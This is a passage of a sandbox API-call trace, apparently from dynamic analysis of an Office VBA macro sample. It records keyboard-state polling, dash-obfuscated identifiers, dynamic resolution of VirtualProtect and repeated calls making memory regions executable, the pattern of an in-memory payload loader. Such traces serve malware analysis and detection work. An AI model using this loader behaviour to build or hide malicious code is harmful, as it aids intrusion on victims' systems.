returned 0 [0107.082] GetAsyncKeyState (vKey=3) returned 0 [0107.378] GetAsyncKeyState (vKey=3) returned 0 [0107.633] GetAsyncKeyState (vKey=3) returned 0 [0107.836] GetAsyncKeyState (vKey=3) returned 0 [0108.182] GetAsyncKeyState (vKey=3) returned 0 [0108.182] SafeArrayDestroyData (psa=0xb3bf3b8) returned 0x0 [0108.193] SafeArrayDestroyDescriptor (psa=0xb3bf3b8) returned 0x0 [0108.193] SafeArrayCopy (in: psa=0xb3bc118, ppsaOut=0x197c84 | out: ppsaOut=0x197c84) returned 0x0 [0108.244] SafeArrayCopy (in: psa=0xb3bf2f8, ppsaOut=0x197e98 | out: ppsaOut=0x197e98) returned 0x0 [0108.280] SafeArrayCopy (in: psa=0xb3bc538, ppsaOut=0x197ff4 | out: ppsaOut=0x197ff4) returned 0x0 [0108.327] CRetailMalloc_Alloc () returned 0xca3d380 [0108.327] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0108.327] memcpy (in: _Dst=0xcb65290, _Src=0x1978c4, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0108.327] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0108.328] memcpy (in: _Dst=0xcb65188, _Src=0x1978a4, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0108.328] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0108.328] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0108.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432eea, cbMultiByte=6, lpWideCharStr=0x1976c4, cchWideChar=7 | out: lpWideCharStr="–——–—") returned 6 [0108.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2ebe, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="–——–—") returned 6 [0108.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2ebe, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="–——–—") returned 6 [0108.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2ebe, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="–——–—") returned 6 [0108.330] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0108.330] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0108.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d2ebe, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="–——–—") returned 6 [0108.330] CRetailMalloc_Alloc () returned 0xf6142a8 [0108.330] _mbscpy_s (in: _Dst=0xf6142a8, _DstSizeInBytes=0x6, _Src=0x111d2ebe | out: _Dst=0xf6142a8) returned 0x0 [0108.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0c86, cbMultiByte=13, lpWideCharStr=0x197734, cchWideChar=14 | out: lpWideCharStr="_B_var_–——–—") returned 13 [0108.330] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x6, _Src=0x111d2ebe | out: _Dst=0x19779c) returned 0x0 [0108.330] CRetailMalloc_Free () returned 0x1 [0108.330] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0108.331] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0108.331] memcpy (in: _Dst=0xcb6518c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0108.331] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0108.331] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0108.331] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0108.332] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0108.332] memcpy (in: _Dst=0xca3d3a2, _Src=0x197878, _Size=0x1 | out: _Dst=0xca3d3a2) returned 0xca3d3a2 [0108.332] memcpy (in: _Dst=0xca3d3f8, _Src=0x197944, _Size=0x18 | out: _Dst=0xca3d3f8) returned 0xca3d3f8 [0108.332] CRetailMalloc_Realloc () returned 0xca3d380 [0108.332] CRetailMalloc_Free () returned 0x1 [0108.332] GetCurrentProcess () returned 0xffffffff [0108.332] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0108.334] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.334] GetCurrentProcess () returned 0xffffffff [0108.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0108.334] GetCurrentProcess () returned 0xffffffff [0108.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0108.334] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.335] GetCurrentProcess () returned 0xffffffff [0108.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0108.335] GetCurrentProcess () returned 0xffffffff [0108.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0108.335] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.335] GetCurrentProcess () returned 0xffffffff [0108.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0108.335] GetCurrentProcess () returned 0xffffffff [0108.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0108.335] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.336] GetCurrentProcess () returned 0xffffffff [0108.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0108.336] GetCurrentProcess () returned 0xffffffff [0108.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0108.336] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.336] GetCurrentProcess () returned 0xffffffff [0108.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0108.336] GetCurrentProcess () returned 0xffffffff [0108.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0108.337] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.337] GetCurrentProcess () returned 0xffffffff [0108.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0108.337] GetCurrentProcess () returned 0xffffffff [0108.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0108.337] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.337] GetCurrentProcess () returned 0xffffffff [0108.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0108.338] GetCurrentProcess () returned 0xffffffff [0108.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0108.338] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.338] GetCurrentProcess () returned 0xffffffff [0108.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0108.338] GetCurrentProcess () returned 0xffffffff [0108.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0108.338] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.339] GetCurrentProcess () returned 0xffffffff [0108.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0108.339] GetCurrentProcess () returned 0xffffffff [0108.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0108.339] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.339] GetCurrentProcess () returned 0xffffffff [0108.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0108.339] GetCurrentProcess () returned 0xffffffff [0108.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0108.339] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.340] GetCurrentProcess () returned 0xffffffff [0108.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0108.340] GetCurrentProcess () returned 0xffffffff [0108.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0108.340] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.340] GetCurrentProcess () returned 0xffffffff [0108.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0108.340] GetCurrentProcess () returned 0xffffffff [0108.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0108.340] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.341] GetCurrentProcess () returned 0xffffffff [0108.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0108.341] GetCurrentProcess () returned 0xffffffff [0108.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0108.341] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.342] GetCurrentProcess () returned 0xffffffff [0108.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0108.342] GetCurrentProcess () returned 0xffffffff [0108.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0108.342] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.342] GetCurrentProcess () returned 0xffffffff [0108.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0108.342] GetCurrentProcess () returned 0xffffffff [0108.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0108.342] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.343] GetCurrentProcess () returned 0xffffffff [0108.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0108.343] GetCurrentProcess () returned 0xffffffff [0108.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0108.343] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.344] GetCurrentProcess () returned 0xffffffff [0108.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0108.344] GetCurrentProcess () returned 0xffffffff [0108.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0108.344] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.344] GetCurrentProcess () returned 0xffffffff [0108.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0108.344] GetCurrentProcess () returned 0xffffffff [0108.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0108.345] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.345] GetCurrentProcess () returned 0xffffffff [0108.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0108.345] GetCurrentProcess () returned 0xffffffff [0108.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0108.345] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.345] GetCurrentProcess () returned 0xffffffff [0108.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0108.346] GetCurrentProcess () returned 0xffffffff [0108.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0108.346] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.346] GetCurrentProcess () returned 0xffffffff [0108.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0108.346] GetCurrentProcess () returned 0xffffffff [0108.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0108.346] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.363] GetCurrentProcess () returned 0xffffffff [0108.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0108.363] GetCurrentProcess () returned 0xffffffff [0108.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0108.363] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.364] GetCurrentProcess () returned 0xffffffff [0108.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0108.364] GetCurrentProcess () returned 0xffffffff [0108.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0108.364] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.364] GetCurrentProcess () returned 0xffffffff [0108.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0108.364] GetCurrentProcess () returned 0xffffffff [0108.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0108.364] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.365] GetCurrentProcess () returned 0xffffffff [0108.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0108.365] GetCurrentProcess () returned 0xffffffff [0108.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0108.365] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.365] GetCurrentProcess () returned 0xffffffff [0108.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0108.365] GetCurrentProcess () returned 0xffffffff [0108.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0108.365] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.366] GetCurrentProcess () returned 0xffffffff [0108.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0108.366] GetCurrentProcess () returned 0xffffffff [0108.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0108.366] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.367] GetCurrentProcess () returned 0xffffffff [0108.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0108.367] GetCurrentProcess () returned 0xffffffff [0108.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0108.367] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.367] GetCurrentProcess () returned 0xffffffff [0108.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0108.367] GetCurrentProcess () returned 0xffffffff [0108.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0108.367] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.368] GetCurrentProcess () returned 0xffffffff [0108.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0108.368] GetCurrentProcess () returned 0xffffffff [0108.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0108.368] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0108.368] GetCurrentProcess () returned 0xffffffff [0108.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0108.370] GetAsyncKeyState (vKey=3) returned 0 [0108.371] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0108.371] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0108.371] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0108.371] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0108.371] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0108.371] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0108.372] VarAdd (in: pvarLeft=0x198068, pvarRight=0x198018, pvarResult=0x198048 | out: pvarResult=0x198048) returned 0x0 [0108.372] SetErrorMode (uMode=0x8001) returned 0x8001 [0108.372] _stricmp (_Str1="kernel32", _Str2="VBE6.DLL") returned -11 [0108.372] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0108.373] SetErrorMode (uMode=0x8001) returned 0x8001 [0108.373] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0108.373] VirtualProtect (in: lpAddress=0x1188e020, dwSize=0x15fab2, flNewProtect=0x40, lpflOldProtect=0x197fdc | out: lpflOldProtect=0x197fdc*=0x4) returned 1 [0109.674] GetLastError () returned 0x5 [0109.674] GetAsyncKeyState (vKey=3) returned 0 [0109.678] CRetailMalloc_Alloc () returned 0xca3d448 [0109.678] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.679] memcpy (in: _Dst=0xcb65290, _Src=0x1978a4, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0109.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb315086, cbMultiByte=10, lpWideCharStr=0x11590228, cchWideChar=22 | out: lpWideCharStr="o93TBY150D") returned 10 [0109.679] CRetailMalloc_Alloc () returned 0xc9cecf8 [0109.679] memcpy (in: _Dst=0xc9ced0c, _Src=0x11590224, _Size=0x1a | out: _Dst=0xc9ced0c) returned 0xc9ced0c [0109.679] memcpy (in: _Dst=0xcb65188, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.679] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.679] memcpy (in: _Dst=0xcb65188, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.679] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb3150a0, cbMultiByte=8, lpWideCharStr=0x11590932, cchWideChar=18 | out: lpWideCharStr="gEzmn7rG") returned 8 [0109.679] memcpy (in: _Dst=0xc9ced2c, _Src=0x1159092e, _Size=0x16 | out: _Dst=0xc9ced2c) returned 0xc9ced2c [0109.679] memcpy (in: _Dst=0xcb6518c, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0109.679] memcpy (in: _Dst=0xcb6518c, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0109.679] memcpy (in: _Dst=0xcb65190, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0109.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb3150b6, cbMultiByte=10, lpWideCharStr=0x11590cd0, cchWideChar=22 | out: lpWideCharStr="mVwBL4NuTS") returned 10 [0109.679] memcpy (in: _Dst=0xc9ced48, _Src=0x11590ccc, _Size=0x1a | out: _Dst=0xc9ced48) returned 0xc9ced48 [0109.679] memcpy (in: _Dst=0xcb65194, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0109.680] memcpy (in: _Dst=0xcb65194, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0109.680] memcpy (in: _Dst=0x1976cc, _Src=0x197740, _Size=0x8 | out: _Dst=0x1976cc) returned 0x1976cc [0109.680] memcpy (in: _Dst=0xc9d46f0, _Src=0x1976cc, _Size=0x8 | out: _Dst=0xc9d46f0) returned 0xc9d46f0 [0109.680] CRetailMalloc_Alloc () returned 0xca0f620 [0109.680] CRetailMalloc_Free () returned 0x1 [0109.680] memcpy (in: _Dst=0xcb65188, _Src=0x197888, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0109.680] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0109.680] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0109.680] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0109.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432f0e, cbMultiByte=22, lpWideCharStr=0x1976a4, cchWideChar=23 | out: lpWideCharStr="––––——–———–—–—–—–—–––") returned 22 [0109.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b01ba, cbMultiByte=22, lpWideCharStr=0x197704, cchWideChar=23 | out: lpWideCharStr="––––——–———–—–—–—–—–––") returned 22 [0109.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b01ba, cbMultiByte=22, lpWideCharStr=0x197704, cchWideChar=23 | out: lpWideCharStr="––––——–———–—–—–—–—–––") returned 22 [0109.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b01ba, cbMultiByte=22, lpWideCharStr=0x197704, cchWideChar=23 | out: lpWideCharStr="––––——–———–—–—–—–—–––") returned 22 [0109.681] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0109.681] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0109.681] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96", cchCount2=-1) returned 3 [0109.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b01ba, cbMultiByte=22, lpWideCharStr=0x197704, 